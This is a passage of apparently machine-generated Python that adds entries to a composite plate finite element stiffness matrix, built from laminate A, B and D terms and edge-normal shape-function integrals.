k0[i4*dof+0, i2*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+0, i3*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+0, i3*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+0, i3*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+0, i3*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+0, i4*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+0, i4*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+0, i4*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+0, i4*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+1, i1*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+1, i1*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+1, i1*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+1, i1*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+1, i2*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+1, i2*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+1, i2*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+1, i2*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+1, i3*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+1, i3*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+1, i3*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+1, i3*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+1, i4*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+1, i4*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+1, i4*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+1, i4*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+3, i1*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+3, i1*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+3, i1*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+3, i1*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+3, i2*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+3, i2*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+3, i2*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+3, i2*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+3, i3*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+3, i3*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+3, i3*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+3, i3*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+3, i4*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+3, i4*dof+1] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+3, i4*dof+3] += Ac*((D11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+3, i4*dof+4] += Ac*((D12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + D66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+4, i1*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+4, i1*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+4, i1*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
